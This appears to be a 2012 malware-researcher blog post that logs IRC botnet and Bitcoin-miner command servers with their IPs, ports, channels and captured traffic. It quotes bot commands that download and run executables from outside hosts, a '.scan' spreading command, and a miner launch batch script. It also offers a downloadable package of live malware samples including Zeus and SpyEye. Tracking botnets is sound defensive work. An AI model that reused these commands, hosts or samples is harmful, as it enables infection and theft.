Month: February 2012

173.163.245.113(irc botnet hosted in United States Albuquerque Comcast Business Communications Llc)

C&C Server: 173.163.245.113:9090 Server Password: Username: MEAT Nickname: {iNF-00-DEU-XP-DELL-3588} Channel: ##hxxp## (Password: ) Channeltopic: :.http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c Now talking in ##hxxp## Topic On: [ ##hxxp## ] [ .http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c ] Topic 11 By 12: [ pe[ro ] hosting infos: http://whois.domaintools.com/173.163.245.113

119.59.99.52(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)

Remote Host Port Number 119.59.99.52 2345 NICK New[USA|00|P|33843] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-7233 * 0 :COMPUTERNAME MODE New[USA|00|P|33843] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/119.59.99.52

sfx.dload.asia(BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)

Resolved : [sfx.dload.asia] To [176.9.42.247] Resolved : [sfx.dload.asia] To [188.40.92.153] Resolved : [sfx.dload.asia] To [188.40.93.82] yz.bat: ping -n 2 127.0.0.1 taskkill /f /im svchoost.exe taskkill /f /im mamita.exe taskkill /f /im x11811.exe taskkill /f /im Winlogon2.exe x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2 file downloaded after login: http://sfx.dload.asia:8332/ -u

188.72.196.163(irc botnet hosted in Turkey Netdirect)

Remote Host Port Number 188.72.196.163 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]572986 USER 5729 “” “TsGh” :5729 JOIN #!N!# WTF PRIVMSG #!N!# :http://tips2x1.bloger.hr Has Been Visited! Now talking in #!N!# Topic On: [ #!N!# ] [ .visit http://tips2x1.bloger.hr ] Topic By: [ NhG ] hosting infos: http://whois.domaintools.com/188.72.196.163

46.166.140.132(ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)

Remote Host Port Number 199.15.234.7 80 46.166.140.132 6667 Clients: I have 112 clients and 0 servers Local users: Current Local Users: 112 Max: 251 Global users: Current Global Users: 112 Max: 251 PONG :D5E8DE88 JOIN #|Bots|# PONG :Vater.irc.mit.edu NICK n{US|XP-32a}jxeicyv USER jxeicyv 0 * :jxeicyv Now talking in #|Bots|# Joins: {HU|W7-64u}txhnliy [txhnliy@rox-7506984E.prtelecom.hu] Modes On: [

big4eva.no-ip.biz(ngrBot hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number 46.17.98.235 6667 Clients: I have 73 clients and 0 servers Local users: Current Local Users: 73 Max: 106 Global users: Current Global Users: 73 Max: 106 NICK SB|USA|XP|XHVDhcSI USER SB|USA|XP|XHVDhcSI big4eva.no-ip.biz SB|USA|XP|XHVDhcSI :SB|USA|XP|XHVDhcSI JOIN #irc NICK SB|USA|XP|vxwfnfOz USER SB|USA|XP|vxwfnfOz big4eva.no-ip.biz SB|USA|XP|vxwfnfOz :SB|USA|XP|vxwfnfOz Now talking in ##xcn Modes On: [ ##xcn ]

173.248.187.166(irc botnet hosted in United States Franklin Mddhosting Llc)

Remote Host Port Number 173.248.187.166 1866 The data identified by the following URLs was then requested from the remote web server: http://dl.dropbox.com/u/55297842/visitweb.exe NICK n[USA|XP|COMPUTERNAME]kvrizpu USER hh “” “lol” :hh JOIN #!g! PONG 422 Now talking in #!g! Topic On: [ #!g! ] [ .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ ] Topic By: [ evoL1x ] hosting infos: http://whois.domaintools.com/173.248.187.166

120mb malware samples

This package contain alot of irc bots like ngrBot,Insomnia and banking trojans like Zeus,Spyeye but the best part of it are the files with the name FuckUPiggw.exe,FuckUPig.exe from one of my fans lol Download Download Download